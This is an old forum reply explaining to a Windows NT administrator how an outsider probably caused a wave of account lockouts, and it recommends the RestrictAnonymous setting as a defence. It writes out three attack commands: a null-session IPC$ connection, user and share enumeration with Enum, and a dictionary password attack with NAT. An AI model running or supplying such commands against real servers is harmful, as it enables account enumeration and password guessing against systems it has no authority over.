Re: Unauthorized account listing from a remote system

From: WB IT (abuse@127.0.0.1)
Date: 11/04/02

  • Next message: Kevin D. Quitt: "Re: Null session vulnerability" 

    From: "WB IT" <abuse@127.0.0.1>
Date: Mon, 4 Nov 2002 16:17:40 -0000

    "Paul Haltenberg" <haltenberg@yahoo.com> wrote in message
    news:c689f975.0211040344.4a31e7f6@posting.google.com...
    > My security logs on Windows NT 4.0 SP6a servers show hundreds of 529
    > and 539 events for last night. Looks like someone outside my LAN
    > attempted to login with the credentials of every user in my domain
    > thus locking out user accounts. First of, I wonder how could this be
    > possible that someone obtained user list for my domain? Second, how
    > could someone attempt to login from a non-domain-member computer?
    > Third, how do I figure out who it was (even log shows workstation name
    > \\ATHLON2000XP, but I don't have such workstation in my domain)?
    > Fourth, how do I prevent this in the future?
    >
    > Any advice/comment would be greatly appreciated!
    > ---

    Net use \\yourserver\IPC$ "" /user: "" (null session)

    Enum -U -M -S -P -G -L -d yourserver > enum.txt

    Nat -o output.txt -u adminname.txt -p hugedictionaryfile.txt yourserver

    b00m busted in and got your ***.

    Maybe they just skipped straight to NAT and enumerated your server.

    Who knows.

    I suggest you check out RestrictAnonymous=1/2. 

    --

                 Shaolin - IT Systems
                     WB Ltd.
.: http://www.security-forums.com :.

    • Quantcast